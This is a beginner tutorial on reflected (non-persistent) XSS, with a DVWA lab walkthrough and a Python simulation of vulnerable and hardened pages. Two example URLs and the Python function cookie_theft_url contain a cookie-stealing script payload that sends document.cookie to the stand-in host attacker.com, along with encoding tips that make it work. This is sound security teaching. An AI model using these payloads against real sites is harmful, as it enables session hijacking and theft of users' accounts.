What is Reflected XSS | Non-Persistent XSS | XSS Basics

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the victim's browser. In reflected XSS the malicious string originates from the victim's own request: the application takes one or more request parameters as input and writes them back into the page it generates without encoding them for the HTML context in which they land. It is one of the most widely exploited web application vulnerabilities. This may not sound harmful at first, but the flaw can be exploited to do one or more of the following:

  • Execute malicious JavaScript
  • Execute client-side exploits
  • Bypass CSRF protections
  • Temporary defacement

In reflected XSS the attacker's payload has to be part of the request sent to the web server, and the server has to echo it back so that the HTTP response contains the payload from the HTTP request. The diagram below shows how a reflected XSS attack works.


1. The attacker crafts a URL containing a malicious string (the attacker's payload) and sends it to the victim. The malicious link would be:
 http://vuln-site.com/?q=<script>window.location='http://attacker.com/?cookie='+document.cookie</script>
2. The victim clicks that link, and the HTTP request, including the XSS payload, is sent to the vulnerable server (website).

3. The vulnerable website responds with a page that contains the attacker-supplied payload.

4. The victim's browser executes the attacker-supplied payload contained in the server response; the script sends the victim's cookies to the attacker's server, so the attacker now has the victim's cookies. (Only cookies without the HttpOnly flag are exposed this way, because document.cookie cannot read HttpOnly cookies.)

Using phishing emails and other social engineering techniques, the attacker lures the victim into unknowingly making a request to the server that contains the XSS payload; the script is reflected in the response and executed inside the victim's browser. Since reflected XSS is not persistent, the attacker needs to deliver the payload to each victim separately, and social networks are often a convenient way to spread such links. A simple example of reflected XSS is:


In the figure above, the submit box has a reflected XSS vulnerability. To test for reflected XSS, we submit a probe payload; if the web app reflects the payload back to the browser unencoded, the page is vulnerable. The most widely used XSS test payload is <script>alert(1)</script>.



As we can see, the page is vulnerable to reflected XSS. Now let's look at the source code of the page. In the browser's address bar we can see the payload (because the form was submitted as an HTTP GET request), assigned to the name parameter.


From here an attacker can craft a malicious payload and send it to the victim in order to steal his or her cookies. The malicious link would look like
http://192.168.56.101/dvwa/vulnerabilities/xss_r/?name=<script>window.location='http://attacker.com/?cookie='+document.cookie</script>
When the victim clicks the link, the payload is reflected into the page and executed. One practical detail: the + in the script must be sent URL-encoded as %2B, because a raw + in a query string is decoded to a space by the server, which would leave window.location='http://attacker.com/?cookie=' document.cookie, a JavaScript syntax error that never runs.
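The request/response cycle in steps 1 to 4 above and the probe test from the DVWA walkthrough, as an added Python example (this is not code from the page or from DVWA). It assumes a stand-in page handler that behaves like DVWA's low-security xss_r page, the attacker host attacker.com from the page's own payload, and only Python's standard library; the server side is simulated in-process so everything runs offline. It also shows the hardened version of the page beside the vulnerable one and the `%2B` encoding the cookie-theft link needs.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical targets, taken from the page's walkthrough.
DVWA_XSS_R = "http://192.168.56.101/dvwa/vulnerabilities/xss_r/"
ATTACKER = "http://attacker.com/"          # assumed attacker-controlled host
PROBE = "<script>alert(1)</script>"         # the usual reflected-XSS probe


def vulnerable_page(name: str) -> str:
    """Stand-in for DVWA's xss_r page at low security: the ``name`` parameter
    is concatenated straight into the HTML. Deliberately vulnerable."""
    return "<html><body><pre>Hello " + name + "</pre></body></html>"


def hardened_page(name: str) -> str:
    """Same page with output encoding for an HTML text context: < > & " '
    become entities, so the browser shows the payload as text instead of
    running it."""
    return ("<html><body><pre>Hello " + html.escape(name, quote=True)
            + "</pre></body></html>")


def serve(url: str, handler) -> str:
    """Steps 2 and 3: the server parses the query string the way PHP fills
    $_GET (percent-decoding, and a raw '+' becomes a space) and hands the
    ``name`` value to the page handler, whose output is the HTTP body."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return handler(params.get("name", [""])[0])


def is_reflected_unencoded(body: str, probe: str = PROBE) -> bool:
    """The test from the walkthrough: the page has reflected XSS when the
    probe comes back with its angle brackets intact. An entity-encoded echo
    (&lt;script&gt;) means the page rendered it as text."""
    return probe in body


def cookie_theft_url(base_url: str = DVWA_XSS_R, param: str = "name") -> str:
    """Step 1: build the link the attacker sends. Only the JavaScript '+' is
    percent-encoded (%2B); sent raw it would decode to a space and break the
    script. Everything else is left readable, as in the page's example."""
    js = ("<script>window.location='" + ATTACKER + "?cookie='"
          + "+document.cookie</script>")
    return base_url + "?" + param + "=" + quote(js, safe="<>/:='?")


if __name__ == "__main__":
    probe_url = DVWA_XSS_R + "?name=" + PROBE
    print("vulnerable page reflects probe:",
          is_reflected_unencoded(serve(probe_url, vulnerable_page)))
    print("hardened page reflects probe:  ",
          is_reflected_unencoded(serve(probe_url, hardened_page)))
    link = cookie_theft_url()
    print("attacker link:", link)
    print("body the victim's browser receives:", serve(link, vulnerable_page))
    # A raw '+' in the query string comes back as a space, which is why the
    # link above encodes it as %2B.
    print(serve(DVWA_XSS_R + "?name=x='+document.cookie", vulnerable_page))
```

`serve()` stands in for the whole server round trip, so the same check can be pointed at the vulnerable handler (probe reflected, page vulnerable) and at the hardened one (probe comes back as `&lt;script&gt;`, not vulnerable). Against a real target you would send the probe with an HTTP client and pass the response body to `is_reflected_unencoded()`; the decision logic is the same.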



Conclusion :

At first, reflected XSS might seem harmless because it requires the victim to send the request containing the malicious string. But with various techniques and methods an attacker can successfully trick the victim and convince him or her to click the malicious link.

Links :

XSS Basics : XSS Guide For Beginners
Stored XSS : Click here
DOM-Based XSS : Click here